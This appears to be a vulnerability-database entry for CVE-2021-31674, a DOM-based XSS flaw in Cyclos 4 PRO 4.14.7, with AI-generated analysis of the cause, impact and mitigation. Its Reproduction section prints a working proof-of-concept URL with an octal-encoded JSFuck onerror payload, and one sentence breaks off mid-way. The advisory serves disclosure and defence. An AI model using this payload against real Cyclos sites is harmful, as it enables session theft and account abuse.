CVE-2021-31674
Description
Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefine enum constant.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Cyclos 4 PRO 4.14.7 and earlier does not sanitize user input in an error page, allowing DOM-based XSS via an undefined enum constant.
Vulnerability
Cyclos 4 PRO version 4.14.7 and earlier fails to validate user-supplied input when displaying an error message for an undefined enum constant. The unsanitized input is passed through a function that uppercases characters, but an attacker can bypass this by using encoded JavaScript (JSFUCK) in the URL fragment, resulting in DOM-based cross-site scripting. The vulnerable code path is reachable via the public registration page or similar routes that trigger an error for invalid enum values.
Exploitation
An unauthenticated attacker sends a crafted URL to a victim, such as [IP]/#users.users.public-registrationxxx%3Cimg%20src=x%20onerror=%22...%22%3E, where the payload uses octal-encoded JSFUCK notation. The victim only needs to open the link in a browser; no authentication or additional user interaction is required. The payload survives the uppercase transformation because the encoded characters are not affected, and when the error message is inserted into the DOM, the embedded onerror event fires and executes arbitrary JavaScript.
Impact
Successful exploitation allows the attacker to execute arbitrary JavaScript in the context of the victim's browser session with the Cyclos application. This can lead to theft of session cookies, exfiltration of sensitive data, or actions performed under the victim's privileges, such as modifying account settings or performing unauthorized transactions [1][2].
Mitigation
No official patch or fixed version has been disclosed by the vendor in the available references. Users of Cyclos 4 PRO 4.14.7 and earlier should consider implementing a web application firewall (WAF) rule to block malicious URL fragments containing encoded JavaScript or onerror handlers. Alternatively, if upgrading is possible, contact the vendor for a patched release. This vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Cyclos/Cyclosdescription
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input validation in error handling for undefined enum constants allows reflected user input to execute as JavaScript."
Attack vector
An unauthenticated, remote attacker crafts a URL containing a malicious payload appended to the fragment identifier (e.g., `/#users.users.public-registrationxxx%3Cimg%20src=x%20onerror=...`). When the victim opens this URL in a browser, Cyclos attempts to resolve an undefined enum constant, triggering an error message that reflects the unsanitized fragment value. The attacker uses JSFuck-encoded JavaScript (octet notation) to bypass the `uppercase()` transformation applied to the error output, causing the injected `
Affected code
The vulnerability resides in the error-handling logic for undefined enum constants in Cyclos 4 PRO 4.14.7 and prior. When a user navigates to a URL containing an invalid enum value (e.g., a non-existent registration path), the application reflects the user-supplied value into an error message without sanitization. The advisory notes that the input passes through an `uppercase()` function, which the attacker bypasses by encoding the payload in JSFuck/octet notation [ref_id=1].
What the fix does
No patch is included in the bundle. The advisory does not specify a fix, but the remediation guidance implied by the vulnerability description is to validate and sanitize user-supplied input before reflecting it in error messages, particularly for enum constants. The application should either reject undefined enum values with a generic error message (without echoing the input) or properly encode the output to prevent script execution [ref_id=1][ref_id=2].
Preconditions
- inputThe attacker must craft a URL with a malicious payload in the fragment identifier.
- networkThe victim must open the crafted URL in a browser that renders Cyclos 4 PRO 4.14.7 or earlier.
- authNo authentication is required; the attacker can be remote and unauthenticated.
Reproduction
1. Craft a URL with the following structure: `[IP]/#users.users.public-registrationxxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E` [ref_id=1][ref_id=2]. 2. Send this URL to a victim. 3. When the victim opens the URL in a browser, Cyclos attempts to resolve the undefined enum constant, reflects the unsanitized input in an error message, and the injected JavaScript executes (e.g., an alert box appears) [ref_id=1][ref_id=2].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- cyclos.commitrex_refsource_MISC
- tf1t.gitbook.io/mycve/cylos/cyclos-4.14.7-dom-based-cross-site-scripting-in-undefined-enum-cve-2021-31674mitrex_refsource_MISC
- www.exploit-db.com/exploits/50908mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.